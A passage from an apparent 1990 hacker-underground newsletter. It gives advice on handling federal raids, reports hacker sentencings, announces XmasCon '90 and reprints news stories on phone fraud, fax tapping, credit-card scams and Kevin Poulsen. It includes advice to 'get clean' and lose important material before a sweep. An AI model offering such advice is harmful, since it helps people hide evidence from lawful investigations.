are warranted only to confiscate items on your premises; however, if
|
|
they are serving a subpoena, they may take what they need, on or off
|
|
your premises. So, in essence, the clean-house preventive measure
|
|
may or may not be useful to you.
|
|
|
|
An important thing to do when Agent Foley (or one of his lesser
|
|
evil counterparts) comes knocking on your door is to cooperate fully.
|
|
Drop a lot of "Yes sir"/"No sir" answers; respond politely. You're
|
|
in no position to be a smart ass, and being friendly surely can not
|
|
hurt you.
|
|
|
|
Another important thing to remember, although it is almost
|
|
opposite of the aforementioned, has to do with what to say. In
|
|
essence, do not say a fucking thing if you are questioned! Remember,
|
|
anything you say or do can and WILL be used AGAINST you in a court of
|
|
law. Simply reply, "I can not answer any questions without counsel",
|
|
or "I first must contact my attorney." You need not answer a damn
|
|
thing they ask of you without an attorney present, and it would most
|
|
probably be very detrimental to do so.
|
|
|
|
This hint parallels the previous one. No matter what you do,
|
|
do not reply to any question with "I don't know anything", or any
|
|
simple derivation of that phrase. If you do, and you are indicted,
|
|
you will be reamed in court. The presence of that statement could
|
|
greatly damage your defense, unless you are conditionally mental or
|
|
something.
|
|
|
|
In essence, those are all you should need. What I have outlined
|
|
is very simple, but logical. You need to keep a level head at least
|
|
while they are on site with you; get pissed off/psycho later, after
|
|
they leave. If you are currently an active member of the Computer
|
|
Underground, you may wish to lose anything that is important to you,
|
|
at least temporarily. Why? Well, the analogy I was given follows
|
|
that: if you were suspected of racketeering, the feds could execute
|
|
a search and seizure on your property. If they can prove by 51% that
|
|
ANY of the confiscated material COULD have been used in your suspected
|
|
racketeering, it is forfeited (i.e. you lost it, for good). The
|
|
forfeiture stands whether or not you are indicted or convicted! So,
|
|
you would be entirely screwed.
|
|
|
|
All of the aforementioned steps are important. Those are all I really
|
|
have to offer. I suggest that you get clean before the sweep occurs,
|
|
and that you stay clean until after the sweep clears. Exercise
|
|
extreme caution. Keep your head high, and keep your back to the wall
|
|
(otherwise, it would be quite possible to find a knife lodged in it).
|
|
Stay safe, and good luck!
|
|
|
|
The Conflict
|
|
11-13-1990
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
***UPDATE.11/16/90: 3 Hackers are DOOMED to prison
|
|
|
|
Frank Darden (Leftist), Adam Grant (Urvile), and Robert Riggs (Prophet)
|
|
were sentenced Friday. Robert, who was currently on probation before the
|
|
incident was sentenced to 21 months in a federal prison. Frank and Adam were
|
|
received sentences of 14 months. All three were ordered to pay $233,000 in
|
|
restitution.
|
|
|
|
Kent Alexander, an assistant U.S. attorney who prosecuted the case, was
|
|
not available for comment.
|
|
|
|
---
|
|
This is not good for the Underground at all. I'm sure the government will
|
|
use the outcome of this to their advantage in speeding up the momentum of
|
|
prosecuting hackers. In their eyes, everyone is in LOD.
|
|
|
|
Dale Boll, a special agent of the Secret Service in Washington, said
|
|
"Telephone companies are preparing for a retaliation from the hacking
|
|
underworld and are beefing up security at all ends of the wire."
|
|
|
|
I can't verify or validate these rumors of retaliation. But I can say if
|
|
you are going to do some sort of retaliation, I would think twice-- It could
|
|
make things worse. This is not a "game" we are playing. No, it's reality.
|
|
And I'm sured Frank, Adam, and Rob are feeling it right now.
|
|
---
|
|
A few words from Erik Bloodaxe on the sentences:
|
|
|
|
"I'm not surprised in the least at the sentencing. However, I'm sure the three
|
|
of them are. I wish I could ask them if all the singing was worth-while in the
|
|
long-run. How can anyone hope to make a deal with federal officals, who with
|
|
in the past year, resorted to such lies and deceit. Everyday I think all this
|
|
will be over and I can get on with my life and possibly use my own computer to
|
|
write a term paper without fear of it's confiscation due to who or what I know
|
|
or have seen or done in the past. Perhaps this will end eventually, but until
|
|
then Mr. Cook will play on the peoples inherient fear of technology and
|
|
exploit everyone in his past on his personal crusade for his own twisted view
|
|
of justus. Are you or have you ever been a member of the Legion of Doom? Tell
|
|
me, do you believe in reincarnation Senator McCarthy?"
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
"The weirdest part of my dream was... when I woke up."
|
|
|
|
And now.... .. ANNOUNCING:
|
|
|
|
The first annual,
|
|
|
|
X M A S C O N '90
|
|
|
|
Where: Houston, TX
|
|
When: December 28th-30th 1990
|
|
Who: All Hackers, Journalists, and Federal Agents
|
|
|
|
Well, it's getting closer.. XmasCon is next month and we plan on having
|
|
the biggest gathering of Hackers & Feds since SummerCon '88!
|
|
|
|
This event was going to be private until word got out. A journalist
|
|
(unnamed) found out about the private event and decided to make it public news
|
|
in the magazine for which he writes. Well, after seeing the words: "XMASCON"
|
|
in a magazine with less readers than Phrack, we decided to announce it
|
|
ourselves. So, here it is-- Your OFFICIAL invitation to the gathering that
|
|
should replace the painful memories of SummerCon'90 (SCon'90? What do you mean?
|
|
there was a SummerCon this year? HA. It surprised me too).
|
|
|
|
Hotel Information:
|
|
La Quinta Inn
|
|
6 North Belt East
|
|
(713) 447-6888
|
|
(Located next to Intercontinental Airport)
|
|
|
|
Fees: $44.00+TAX a night (single)
|
|
$56.00+TAX a night (double)
|
|
|
|
Government Discount (With ID)
|
|
$49.00+TAX a night (single)
|
|
$37.00+TAX a night (double)
|
|
|
|
1-800-531-5900
|
|
|
|
|
|
Call for reservations in advance. Please tell the registar that you are with
|
|
XmasCon'90. Everyone is welcome to attend, and I do mean EVERYONE.
|
|
|
|
|
|
Take care & see you at HoHoCon!
|
|
|
|
--DH
|
|
|
|
_______________________________________________________________________________
|
|
|
|
F R O M T H E W I R E
|
|
|
|
|
|
HEADLINE Thirteen Arrested For Breaking Into University Computer
|
|
Byline: PAT MILTON
|
|
DATE 08/16/90
|
|
SOURCE The Associated Press (ASP)
|
|
Origin: FARMINGDALE, N.Y.
|
|
(Copyright 1990. The Associated Press. All Rights Reserved.)
|
|
|
|
|
|
* FARMINGDALE, N.Y. (AP) _ Thirteen computer hackers ranging in age from 14 to
|
|
32 were charged Thursday with breaking into the mainframe computer at a
|
|
university in Washington state and causing costly damage to the files. One of
|
|
the suspects is a 14-year-old high school student from New York City who is
|
|
also a suspect in last November's break-in of an Air Force computer in the
|
|
Pentagon, according to Senior Investigator Donald Delaney of the New York State
|
|
Police. The student, who used the name "Zod" when he signed onto the computer,
|
|
is charged with breaking into the computer at the City University of Bellevue
|
|
in Washington in May by figuring out the toll-free telephone number that gave
|
|
students and faculty legitimate access to the system.
|
|
|
|
"Zod," who was not identified because he is a minor, maintained control over
|
|
the system by setting up his own program where others could illegally enter the
|
|
system by answering 11 questions he set up.
|
|
|
|
More than 40 hackers across the country are believed to have gained illegal
|
|
access to the system since May, Delaney said. As a result of the break-in,
|
|
university files were altered and deleted, and consultants must be hired to
|
|
reprogram the system, Delaney said. In addition to the arrests, search
|
|
warrants were executed at 17 locations on Thursday where officers confiscated
|
|
$50,000 worth of computers and related equipment. Three more arrests were
|
|
expected. Two of the 13 arrested were from Long Island and the rest were from
|
|
the New York boroughs of Brooklyn, Queens, Manhattan and the Bronx.
|
|
Farmingdale is on Long Island. The 13 were charged with computer tampering,
|
|
computer trespass, unauthorized use of a computer and theft of services. The
|
|
juveniles will be charged with juvenile delinquency.
|
|
|
|
The investigation began two months ago after a technician at the university
|
|
noticed "error message" flashing on the computer screen, indicating someone had
|
|
entered the system illegally. The suspects were traced through subpoenaed
|
|
telephone records. * Many hackers break into private computer systems for the
|
|
pure satisfaction of cracking the code, and also to obtain sometimes costly
|
|
computer programs, Delaney said.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE US Sprint helps business customers battle PBX fraud
|
|
DATE 09/25/90
|
|
SOURCE BUSINESS WIRE (BWR)
|
|
|
|
|
|
KANSAS CITY, Mo.--(BUSINESS WIRE)--US Sprint Wednesday announced its corporate
|
|
security department will help the company's business customers battle PBX
|
|
fraud. After producing significant results in fighting code abuse US Sprint is
|
|
directing their efforts to help their business customers in identifying and
|
|
preventing computer hackers from infiltrating their business customer's owned
|
|
or leased telephone switching equipment. ``Unauthorized use of our
|
|
long-distance service has been greatly reduced through increased detection,
|
|
prevention, investigation and prosecution efforts,'' said Bob Fox, US Sprint
|
|
vice president corporate security.
|
|
|
|
``Now rather than attacking a long-distance carrier's network in * an attempt
|
|
to steal authorization codes, computer hackers are attacking private companies'
|
|
and governmental agencies' Private Branch Exchanges (PBX's). Computer
|
|
hackers break into private telephone switches in an attempt to reoriginate
|
|
long-distance calls, which are then billed to the businesses. Fox says a
|
|
business may not discover its telephone system has been ``hacked'' until their
|
|
long-distance bill is received and then it may be too late. Help is on the way
|
|
however. US Sprint has started a customer support program to help the
|
|
company's business customers to combat the situation. Del Wnorowski, US Sprint
|
|
senior vice president-general counsel said, ``The new program is customers
|
|
about the potential for telecommunications fraud committed through their owned
|
|
or leasesd switching equipment and to assist them in preventing this type of
|
|
illegal activity.'' US Sprint is a unit of United Telecommunications Inc., a
|
|
diversified telecommunications company headquartered in Kansas City.
|
|
|
|
CONTACT:
|
|
US Sprint, Kansas City.
|
|
Phil Hermanson, 816/276-6268
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE Fax pirates find it easy to intercept documents
|
|
DATE 09/10/90
|
|
SOURCE Toronto Star (TOR)
|
|
Edition: METRO
|
|
Section: BUSINESS TODAY
|
|
Page: B4
|
|
(Copyright The Toronto Star)
|
|
|
|
|
|
--- Fax pirates find it easy to intercept documents ---
|
|
|
|
TOKYO (Special) - Considering that several years ago enthusiastic hackers began
|
|
breaking into computer systems worldwide to steal valuable information, it
|
|
could only have been a matter of time before the same problem surfaced for
|
|
facsimile machines. Now, officials of Nippon Telegraph and Telephone Public
|
|
Corp. report evidence that this has been happening, not only in their own
|
|
country but around the globe. Apparently, anyone with just a little knowledge
|
|
of electronics can tap fax messages being sent from one of these relatively
|
|
unsophisticated machines to another, with the duplication printed out on the
|
|
pirate's facsimile machine. Both the sender and the receiver of the faxed
|
|
document remain completely unaware that they have been bugged. "I shudder to
|
|
think of some of the business documents which only recently moved over my
|
|
company's fax machines being examined by our competitors," one Tokyo executive
|
|
nervously admits when informed that there has been a proliferation of tapping.
|
|
"You don't think the tax people are doing it too?" he then asks in mock terror.
|
|
|
|
It is certainly a frightening thought. The technique involves making a
|
|
secret connection with the telephone line of the party whose fax messages are
|
|
to be intercepted. That is all too easy to accomplish, according to officials
|
|
of Nippon Telegraph and Telephone. Apart from a few special cases, very little
|
|
has been done to guard against outside tapping. As a result, one of the most
|
|
vulnerable areas - and one most businessmen and women now should begin to feel
|
|
unsure of - is the privacy or security of the facsimile machine. Technical
|
|
attention to this problem is in order.
|
|
|
|
"The idea that somewhere out there is 'Conan the Hacker' who is reading my
|
|
fax correspondence as readily as I do sends chills up my spine," says one
|
|
American businesswoman here. "There could be a lot of trouble for me and up to
|
|
now I didn't even realize it was possible." It is not only possible, but easy.
|
|
Ordinary components available at any electronics store can be used. With these
|
|
in hand, tappers can rig up a connection that sets off a warning signal,
|
|
without the sender or receiver realizing it, whenever a fax message passes
|
|
along the telephone line. Considering the growing volume of highly
|
|
confidential material being sent and received via fax equipment, the resulting
|
|
leaks can be considered highly dangerous to the security of corporate
|
|
information.
|
|
|
|
In Japan alone it is estimated that there are 3.7 million
|
|
machines in operation. Given the nature of these tapping operations, it would
|
|
appear to be extremely difficult for companies to determine whether they are
|
|
suffering serious damage from this process. In addition, it is clear that a
|
|
great many corporations have yet to realize the extent of the threat to their
|
|
privacy. "If more business executives recognized what is going on," suggests
|
|
one Japanese security specialist, "they would move now to halt the opportunity
|
|
for leaks and thus protect their corporations from this type of violation." He
|
|
went on to note that third parties mentioned in fax messages also can be badly
|
|
hurt by these interceptions. Fortunately, manufacturers are producing machines
|
|
capable of preventing hackers from tapping into the system. In some cases,
|
|
newly developed fax machines use code systems to defend information
|
|
transmitted. But these tap-proof facsimile machines are not yet in general
|
|
use. Makers of the new "protected" facsimile machines predict that once the
|
|
business communities around the globe become aware of the threat they will
|
|
promptly place orders for replacements and junk their old equipment as a simple
|
|
matter of damage control. The market could prove extremely large. Those few
|
|
leak-proof fax machines now in operation depend upon scrambling messages, so
|
|
that even if a pirate taps into the telephone line leading to the unit, the
|
|
intercepted message is impossible to read.
|
|
|
|
Nippon Telegraph and Telephone, for example, claims that it would require
|
|
a hacker using a large computer more than 200,000 years to crack the codes used
|
|
in its own pirate-proof fax. This ultimately may prove to be something of an
|
|
exaggeration. Although in Japan and many other countries this kind of tapping
|
|
clearly is illegal, it remains nearly impossible to track down electronic
|
|
eavesdroppers. As far as is known, none of these snoopers have been identified
|
|
and dragged into court. Security specialists in Japan claim that there may be
|
|
thousands of fax hackers who get their kicks out of intercepting and reading
|
|
other people's business mail, with few using the information for illegal
|
|
purposes or actively conveying it to third parties.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE Inmate behind scams
|
|
Byline: JOHN SEMIEN
|
|
DATE 09/11/90
|
|
SOURCE THE BATON ROUGE SUNDAY ADVOCATE (BATR)
|
|
Section: NEWS
|
|
Page: 1-B
|
|
(Copyright 1989 by Capitol City Press)
|
|
|
|
|
|
There wasn't much inmate Lawrence "Danny" Faires couldn't buy, sell or
|
|
steal with a telephone call from his jail cell in Miami when his million-dollar
|
|
fraud ring ran afoul of the U.S. Secret Service in 1989. That was the year
|
|
Faires used a portable computer with an automatic dialing program to "hack out"
|
|
access codes to the long-distance lines of Telco Communications Inc., a Baton
|
|
Rouge-based phone company. Telco officials were alarmed when they spotted
|
|
1,500 attempts at gaining unauthorized access to the company's long-distance
|
|
service in a single 12-hour period in January 1989.
|
|
|
|
Convinced that an organized fraud scheme was at work, Telco called
|
|
Resident Agent Phil Robertson, who heads the service's Baton Rouge office.
|
|
|
|
"They told me they felt they were being attacked by hackers who had discovered
|
|
their long-distance access lines and who were hacking out personal
|
|
identification numbers belonging to their customers," Robertson said Monday.
|
|
|
|
"You are billed based on your pin (access) number. The computer hacker had
|
|
located several of their 800 numbers and had entered digits hoping it would be
|
|
a valid pin number." Using computer records, Robertson said agents were able to
|
|
isolate 6,000 fraudulent Telco calls that were made during a three-week period
|
|
of January. More than a third of those calls were traced to a cell block in
|
|
the Dade County Interim Detention Center that has been home for Faires for the
|
|
past four years. Faires is awaiting trial in Miami on first-degree murder
|
|
charges. "As it turned out, all of the inmates in this cell block are awaiting
|
|
trial," Robertson said. "One of the inmates, Danny Faires, had a computer in
|
|
his cell attached to a modem, and he turned out to be the hacker."
|
|
|
|
"All he had to do was plug his modem in, let it make the calls and check his
|
|
printout for the numbers that came back good," the agent said. In checking out
|
|
the other bogus Telco calls, agents uncovered a massive credit card scam. A
|
|
federal grand jury in Milwaukee, Wis., linked both scams to Faires and alleged
|
|
associates of the inmate across the country in a Feb. 27 indictment of six
|
|
people on federal wire and access device fraud. Fairies, an unindicted
|
|
co-conspirator in the case, last week said he has spent the past three years
|
|
applying his previous experience as a computer systems analyst and programmer
|
|
to a lap-top, portable computer provided by one of the prison guards. He
|
|
describes the results as "doing business with America" at the expense of large
|
|
credit card and telecommunications companies. Faires said he attacked Telco's
|
|
system by chance after receiving one of the company's access numbers in a group
|
|
of assorted access codes acquired by his associates. "It was just their
|
|
misfortune that we became aware that they had a system there that was easily
|
|
accessible," Faires said in a telephone interview.
|
|
|
|
"I was given their access number, along with Sprint and MCI, I guess
|
|
virtually every company in America we got." Faires said he used the stolen,
|
|
long distance phone time and other stolen credit card numbers to access
|
|
networks with credit information from major department stores and mail order
|
|
businesses. "You come up to the door and the door is locked," he said. "You
|
|
have to buy access. Well, I bought access with credit cards from another
|
|
system. I had access codes that we had hacked. "I could pull your entire
|
|
credit profile up and just pick the credit card numbers that you still had some
|
|
credit in them and how many dollars you had left in your account and I would
|
|
spend that," Faires said. "My justification was, I don't know the creditor and
|
|
he had no knowledge of it so he won't have to pay it." However, Faires said he
|
|
now thinks of the trouble the illegal use of the credit cards has caused his
|
|
victims in their efforts to straighten out damaged credit records. "I remember
|
|
I took a course once that was called computer morality about the moral ethics
|
|
to which we're morally bound," he said. "It's like a locksmith. Even though
|
|
he can open a lock, he's morally bound not to if it's not his lock. I violated
|
|
that."
|
|
|
|
The vulnerability of credit card companies to hackers is the subject of an
|
|
unpublished book that Faires said he has written. Faires said his book
|
|
includes tips on how businesses and others can safeguard access to their
|
|
credit, but added that there may be no way to be completely safe from
|
|
hackers. "It's untitled as yet," he said about the book. "We're leaving that
|
|
open. I'm waiting to see if they electrocute me here, then I'm going to put
|
|
something about "I could buy it all but couldn't pay the electric bill.' "
|
|
[This guy is a real toon -DH]
|
|
|
|
While Faires has not been formally charged in connection with the scheme,
|
|
last week he said he was sure charges will be forthcoming because "there is no
|
|
question about my involvement." The other six alleged conspirators are John
|
|
Carl Berger and George A. Hart Jr. of Milwaukee, Wis.; Charles Robert McFall
|
|
and Victor Reyes of San Antonio, Texas; Steven Michael Skender Jr. of West
|
|
Allis, Wis.; and Angelo Bruno Bregantini of Marshville, N.C. All six men are
|
|
charged with conspiracy to commit access device and wire fraud. Berger,
|
|
Skender, Reyes and Bregantini also are charged separately with multiple counts
|
|
of wire fraud.
|
|
|
|
The indictments are the first criminal charges generated by Operation
|
|
Mongoose, an ongoing Secret Service probe of credit card and long-distance
|
|
telephone access fraud. The charges allege that Faires has had access to a
|
|
telephone since his arrest and imprisonment in Miami in 1986, an allegation
|
|
that has prompted a separate probe by Miami authorities. That phone was used
|
|
to make frequent calls to a building on Brookfield Road in Brookfield, Wis.,
|
|
where another alleged unindicted co-conspirator, Fred Bregantini, operates
|
|
various businesses, according to the indictment. The indictment said Faires
|
|
and Fred Bregantini were "at the hub" of the telephone and credit card scam.
|
|
The two men are accused of collecting credit card numbers and telephone access
|
|
codes from other defendants in the case and using the numbers to purchase
|
|
merchandise, services and "other things of value." Robertson said agents
|
|
believe the members of the ring copied many of these stolen numbers from credit
|
|
card receipts retrieved from the trash cans of various businesses. He said the
|
|
practice, commonly called "dumpster diving," is a widely used method in credit
|
|
card fraud. [`dumpster diving' eh? -DH]
|
|
|
|
While some of the defendants helped make purchases on the stolen cards,
|
|
the indictment alleges that others provided addresses used for the shipment of
|
|
the stolen goods. The goods included gold coins, plane tickets, computer
|
|
equipment, tools and stereo equipment. Robertson said agents are still
|
|
tallying the cost of the scam to Telco and other companies but that the damage
|
|
has already climbed past $1 million. Herbert Howard, president of Telco, on
|
|
Friday said the company lost from $35,000 to $40,000 in revenues from illegal
|
|
calls and in additional expenses for researching Faires' use of access codes.
|
|
"It was really a learning experience for us because this is the first time this
|
|
has happened," Howard said about his 2-year-old company. "I think it's a fear
|
|
of all long-distance companies. It's very fortunate that we caught it as
|
|
quickly as we did."
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE No, I'm not paranoid, but who is No. 1?
|
|
Byline: DENISE CARUSO
|
|
Column: INSIDE SILICON VALLEY
|
|
DATE 08/21/90
|
|
SOURCE SAN FRANCISCO EXAMINER (SFEX)
|
|
Edition: FIFTH
|
|
Section: BUSINESS
|
|
Page: D-16
|
|
(Copyright 1989)
|
|
|
|
|
|
THOUGH I didn't plan it that way, this week proved to be a perfect time to
|
|
start renting old episodes of "The Prisoner" - that very dark, very paranoid
|
|
British spy series from the early '60s which foresaw a bleak future in which
|
|
"een-formation" was of paramount importance, no matter whose "side" you were
|
|
on. Every well-paid company representative from every telephone service
|
|
provider in North America earned his or her keep this week, fielding calls from
|
|
blood-thirsty members of the press corps who also wanted "een-formation" about
|
|
whether or not the huge long-distance snafu with AT&T was a "hack" (an illegal
|
|
break-in) or some form of computerized germ warfare.
|
|
|
|
I'm happy that the answer was "no," but of course the event opens a rather
|
|
nasty can of worms: has AT&T's problem tipped off the hacker community that
|
|
the phone network is vulnerable? "That's a very good question," said one
|
|
network engineer I spoke with last week. But, he assured me, his network was
|
|
totally secure and had all kinds of safeguards built in to prevent either
|
|
outside penetration or the introduction of a software virus to the system. I
|
|
hope he's right, but I must admit, I've heard that song before.
|
|
|
|
Here, for example, is an excerpt from an anonymous piece of electronic
|
|
mail I received last week, slightly edited to correct grammatical
|
|
imperfections: "It may be of interest to you to know, if I wanted to have
|
|
"fun," "evil" deeds could be done by remote control, up to and including
|
|
shutting down every ESS (electronic switching station) office in North America.
|
|
|
|
"Less evil and more fun might be to shut down the stock market for a day,
|
|
scramble all transactions, or even send it down in a tail spin! Banks aren't
|
|
immune either. This may sound very darkside, but people must have what is
|
|
needed to fight back if things go bad!" Not disturbing enough? Try this one on
|
|
for size: Back in July of '89, I wrote of a story in the premier issue of the
|
|
magazine Mondo 2000 that detailed how one might set about hacking automatic
|
|
teller machines (ATMs). That story contained everything but the blueprints for
|
|
the device, which the magazine's editors didn't print because they thought it
|
|
would be irresponsible to do so. But now, a student-owned Cornell University
|
|
publication called "Visions Magazine" - for which Carl Sagan is creative
|
|
adviser - has asked the article's author, Morgan Russell, for rights to reprint
|
|
the article in its entirety, including device blueprints.
|
|
|
|
These kinds of stories are disturbing, yet somehow I've always expected
|
|
they would happen, a reaction that's similar to the way I feel when I watch
|
|
"The Prisoner." No. 6, as he's called, cries out at the beginning of every
|
|
episode, "I am not a number! I am a free man!" His will to resist is
|
|
sufficient to fend off the authorities who believe their need for the
|
|
"een-formation" in No. 6's head gives them the right to try to control his
|
|
movements and thoughts, using - of course - only the most impressive
|
|
technology.
|
|
|
|
Of course, the science-fiction fantasy of impressive technology in the
|
|
'60s, when "The Prisoner" was created, was as authoritarian and centralized as
|
|
the governments using it. Not many faceless authorities back then were
|
|
predicting a near-future where all classes of people had access to, could
|
|
afford and knew how to use powerful technology. (I'm sure it would have ruined
|
|
their supper if they had.) Neither did they envision today's growing class of
|
|
technological sophisticates - whether self-taught PC hackers or trained
|
|
computer scientists - who, by virtue of their knowledge, could cripple,
|
|
disable, or otherwise confound the system which spawned them. Have any opinion
|
|
you'd like about the right or wrong of it. Fact is, whether it's the phone
|
|
network or a bank teller machine, the more we rely on technology, the less we
|
|
can rely on technology.
|
|
|
|
Though this fact can make life unpleasant for those of us who are
|
|
victimized by either the machines we trust or the people who know how to fidget
|
|
with them, there is something strangely comforting about knowing that, after
|
|
all, a computer is still only as trustworthy as the humans who run it. Write
|
|
|
|
CONTACT:
|
|
Denise Caruso, Spectra, San Francisco Examiner
|
|
P.O Box 7260
|
|
San Francisco, CA 94120. (Denise
|
|
|
|
MCI Mail (Denise Caruso) - CompuServe (73037,52) - CONNECT (Caruso)
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE US Sprint to Supply Soviet Venture With Switches
|
|
DATE 09/17/90
|
|
SOURCE WALL STREET JOURNAL (WJ)
|
|
|
|
|
|
WASHINGTON -- US Sprint Communications Corp. said it obtained U.S. government
|
|
approval to supply a Soviet joint venture with packet switches that can greatly
|
|
improve telecommunications services between the Soviet Union and other
|
|
countries. The imminent shipment of these switches was announced by William
|
|
Esrey, chairman and chief executive officer of United Telecommunications Inc.,
|
|
shortly after completing a visit to the Soviet Union with Commerce Secretary
|
|
Robert Mosbacher and the chief executives of other U.S. companies. United
|
|
Telecommunications is the parent of US Sprint.
|
|
|
|
The export license that US Sprint expects to obtain as early as this week
|
|
will be the first license for telecommunications equipment granted by the U.S.
|
|
under the new, relaxed regulations for shipping technology to the Soviet Union,
|
|
Esrey said. * The Soviet venture, Telenet USSR, will be owned by a US Sprint
|
|
subsidiary, Sprint International, and the Soviet Ministry of Post and
|
|
Telecommunications and the Larvian Academy of Sciences, a Soviet research
|
|
group. The Commerce Department doesn't discuss details of individual license
|
|
applications, but Mosbacher has publicly supported technology tie-ups between
|
|
the U.S. companies represented in his traveling group and potential Soviet
|
|
partners. US Sprint appears to be leading the race among American
|
|
telecommunications companies to establish solid ties in the Soviet Union. An
|
|
earlier proposal by U S West Inc. to lay down part of an international
|
|
fiber-optic line across the Soviet Union was rejected by U.S. authorities
|
|
because of the advanced nature of the technology.
|
|
|
|
US Sprint's packet switches, however, appear to be within the new
|
|
standards for permissible exports to the Soviet Union. The switches are used
|
|
to route telephone calls and control traffic in voice, facsimile and
|
|
digitalized data transmission. These eight-bit switches are one or two
|
|
generations behind the comparable systems in use in Western countries, but are
|
|
still good enough to sharply improve the ability of Sprint's Soviet customers
|
|
to communicate with other countries, Esrey's aides said. The company declined
|
|
to discuss the value of its investment or to disclose how many switches will be
|
|
sold. US Sprint said its venture will operate through new, dedicated satellite
|
|
lines that will augment the often-congested 32 international lines that
|
|
currently exist for Moscow-based businesses. Esrey said he expects the venture
|
|
to be in operation before the end of this year.
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE BT Tymnet Introduces Additional XLINK Services
|
|
DATE 09/09/90
|
|
SOURCE DOW JONES NEWS WIRE
|
|
|
|
SAN JOSE, Calif. -DJ- BT Tymnet Inc. said XLINK Express, a family of new,
|
|
bundled, port-based, synchronous X.25 (XLINKs) services, is available. The
|
|
XLINK service offers customers lower cost X.25 host access to its TYMNET
|
|
network, the company said in a news release. XLINKs are leased-line private
|
|
access port services for X.25 interfaces at speeds up to 19.2 bits per second
|
|
and supporting up to 64 virtual circuits.
|
|
|
|
XLINK Express includes port access, leased line, modems, software, and free
|
|
data transmission. Prior to XLINK Express, customers requiring a
|
|
9.6-bit-per-second leased line for standard X.25 host connectivity would
|
|
typically pay about $1,500 monthly for their leased line, modems and interface.
|
|
With XLINK, customers can now be charged a monthly rate of $900, the company
|
|
said.
|
|
|
|
BT Tymnet Inc. is a unit of British Telecom plc.
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE Hacker may be taunting the FBI; Whiz suspected of invading U.S. army
|
|
computer
|
|
Credit: PENINSULA TIMES TRIBUNE
|
|
DATE 04/10/90
|
|
SOURCE Montreal Gazette (GAZ)
|
|
Edition: FINAL
|
|
Section: NEWS
|
|
Page: F16
|
|
Origin: PALO ALTO, Calif.
|
|
(Copyright The Gazette)
|
|
|
|
--- Hacker may be taunting the FBI; Whiz suspected of invading
|
|
U.S. army computer ---
|
|
|
|
PALO ALTO, Calif. - The computer prodigy wanted on suspicion of invading a
|
|
U.S. army computer may be taunting FBI agents by defiantly talking to his
|
|
hacker buddies on electronic bulletin boards while he eludes a manhunt,
|
|
authorities said. The mysterious Kevin Poulsen, a former Menlo Park, Calif.,
|
|
resident described by many as a computer genius, is outsmarting the FBI and
|
|
apparently has the savvy to make this game of hide-and-seek a long contest.
|
|
|
|
No, investigators are not getting frustrated, FBI official Duke Diedrich
|
|
said. "It's just a matter of time. We've got our traps and hopefully one day
|
|
we'll be able to get the mouse." Authorities have issued an arrest warrant for
|
|
the former SRI International computer expert. He has been at large since at
|
|
least Jan. 18, when federal officials revealed allegations of a sensational
|
|
computer conspiracy. The FBI says Poulsen, 24, is the mastermind of a complex
|
|
computer and telephone-system invasion that included breaking into an
|
|
unclassified army computer network, snooping on the FBI and eavesdropping on
|
|
the calls of a former girlfriend. FBI agents believe he may be in southern
|
|
California, but because he is apparently still hooked up to a national network
|
|
of hackers, he could be using his friends to hide just about anywhere, Diedrich
|
|
said. Poulsen is adept at manufacturing false identification and knows how to
|
|
use the phone system to cover traces of his calls.
|
|
|
|
Agents believe his hacker talk on electronic bulletin boards is perhaps "a
|
|
way of taunting law enforcement officials," Diedrich said. Poulsen may be back
|
|
to his old tricks, but "he's not hiding with the usual bunch of hackers," said
|
|
John Maxfield, a computer security consultant and former FBI informant.
|
|
|
|
Maxfield, known nationally as a "narc" among young hackers, said he had
|
|
underground sources who said Poulsen was rumored to be living alone in a
|
|
southern California apartment. Poulsen's computer chatter could lead to his
|
|
downfall, Maxfield said. Many hackers are electronic anarchists who would be
|
|
happy to turn in a high-ranking hacker, thereby pushing themselves up the
|
|
status ladder, he said. But Poulsen probably has access to a steady flow of
|
|
cash, so he doesn't have to get a job that might lead to his arrest, Maxfield
|
|
said.
|
|
|
|
With his expertise, Poulsen could easily crack the bank computers that
|
|
validate cash transactions and then credit his own accounts, Maxfield said.
|
|
The FBI isn't desperate, but agents have contacted America's Most Wanted, a
|
|
television show that asks viewers to help authorities find fugitives.
|
|
|
|
Poulsen's mother, Bernadine, said her son called home just after police
|
|
announced there was a warrant for his arrest, but he had not called since.
|
|
During the brief call, "He just apologized for all the stress he was causing
|
|
us." The fugitive's motivation baffles Maxfield.
|
|
|
|
The self-described "hacker tracker" has conducted investigations that have
|
|
led to dozens of arrests, but the Poulsen-contrived conspiracy as alleged by
|
|
the FBI is strange, he said. Most teen-age hackers are thrill seekers, he
|
|
explained. The more dangerous the scam, the bigger the high. But Poulsen is
|
|
24. "Why is he still doing it?" Maxfield asked.
|
|
|
|
Poulsen, alias "Dark Dante" and "Master of Impact," was a member of an
|
|
elite hacker gang called Legion of Doom. [Poulsen was never a member of the
|
|
group -DH]
|
|
|
|
The 25 or so mischievous members are now being arrested one by one, Maxfield
|
|
said. They consider themselves misfits, but smart misfits who are superior to
|
|
the masses of average people who have so labelled them, he said. [Baha,
|
|
Maxfield really cracks me up -DH]
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Kevin recently had a 15 minute television debut on NBC's "Unsolved
|
|
Mystries". The program showed renactments of Kevin breaking into CO's and
|
|
walking around his apartment filled with computers and other 'listening'
|
|
devices (as the show called them).
|
|
|
|
I personally got a kick out of the photographs he took of himself holding
|
|
switching equipment after a break-in at a CO.
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE Amtrak Gets Aboard SDN
|
|
Byline: BETH SCHULTZ
|
|
DATE 10/25/90
|
|
SOURCE COMMUNICATIONS WEEK
|
|
Issue: 267
|
|
Section: PN
|
|
Page: 58
|
|
(Copyright 1989 CMP Publications, Inc. All rights reserved.)
|
|
|
|
WASHINGTON - Amtrak, always looking for ways to reduce the amount of government
|
|
funding it takes to keep it on track, has switched its long distance traffic
|
